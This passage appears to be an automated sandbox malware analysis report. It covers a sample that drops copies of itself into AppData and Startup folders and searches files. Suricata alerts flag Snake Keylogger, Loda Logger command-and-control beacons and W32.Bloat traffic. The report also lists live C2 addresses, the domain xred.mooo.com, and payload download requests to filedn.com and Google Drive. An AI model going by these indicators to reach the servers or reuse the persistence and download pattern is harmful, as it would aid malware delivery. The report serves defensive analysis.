                            Source: wscript.exe, 00000000.00000003.1488585616.000001C7E54BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                            Source: Google.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                            Source: Google.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: autorun.inf
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004CDD92 GetFileAttributesW,FindFirstFileW,FindClose,4_2_004CDD92
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_00502044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00502044
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_0050219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_0050219F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_005024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,4_2_005024A9
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,4_2_004F6B3F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,4_2_004F6E4A
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,4_2_004FF350
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004FFD47 FindFirstFileW,FindClose,4_2_004FFD47
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,4_2_004FFDD2
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C92044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00C92044
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C9219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00C9219F
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C924A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,13_2_00C924A9
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C86B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,13_2_00C86B3F
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C86E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,13_2_00C86E4A
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C8F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,13_2_00C8F350
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C8FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,13_2_00C8FDD2
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C5DD92 GetFileAttributesW,FindFirstFileW,FindClose,13_2_00C5DD92
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C8FD47 FindFirstFileW,FindClose,13_2_00C8FD47
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B12044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,32_2_00B12044
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B1219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,32_2_00B1219F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B124A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,32_2_00B124A9
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B06B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,32_2_00B06B3F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B06E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,32_2_00B06E4A
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B0F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,32_2_00B0F350
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00ADDD92 GetFileAttributesW,FindFirstFileW,FindClose,32_2_00ADDD92
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B0FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,32_2_00B0FDD2
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B0FD47 FindFirstFileW,FindClose,32_2_00B0FD47
                            Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
                            Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
                            Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: excel.exeMemory has grown: Private usage: 2MB later: 71MB

                            Networking

                            Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49720 -> 172.111.138.100:5552
                            Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.8:49718 -> 69.42.215.252:80
                            Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49747 -> 172.111.138.100:5552
                            Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49753 -> 172.111.138.100:5552
                            Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.8:49755 -> 69.42.215.252:80
                            Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49796 -> 172.111.138.100:5552
                            Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49837 -> 172.111.138.100:5552
                            Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49879 -> 172.111.138.100:5552
                            Source: Network trafficSuricata IDS: 2830912 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon Response M2 : 172.111.138.100:5552 -> 192.168.2.8:49879
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49729 -> 142.250.185.78:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49715 -> 142.250.185.78:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49714 -> 142.250.185.78:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49721 -> 142.250.185.78:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49722 -> 142.250.185.78:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49735 -> 142.250.185.78:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49734 -> 142.250.185.78:443
                            Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49730 -> 142.250.185.78:443
                            Source: C:\Windows\System32\wscript.exe Network Connect: 23.109.93.100 443
                            Source: Malware configuration extractorURLs: xred.mooo.com
                            Source: Initial file: .write mpNlrHUj.responseBody
                            Source: Initial file: .savetofile FileName , 2
                            Source: unknownDNS query: name: freedns.afraid.org
                            Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                            Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                            Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                            Source: global trafficHTTP traffic detected: GET /lp8FEqN2c8WurlGY9Azex17/Machine-PO.exe HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: filedn.comConnection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_0050550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,4_2_0050550C
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VC9Az_mxJ6FjsLomJdQOpKgQ4a1FhUiWGrzaZIMrw8k6urzaBLn7gtF1ACWlSJ8unr8PDR5SNcOe093vYylGPwpZvusWE7hocDA-7-p5uk-Flsh3bUQs_rlUzgEjafxKOB_oLSUQknDeVd8xqaAFKac_Rpc5-jpZSSFqffNXjgy_zxzFCv8KJUM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
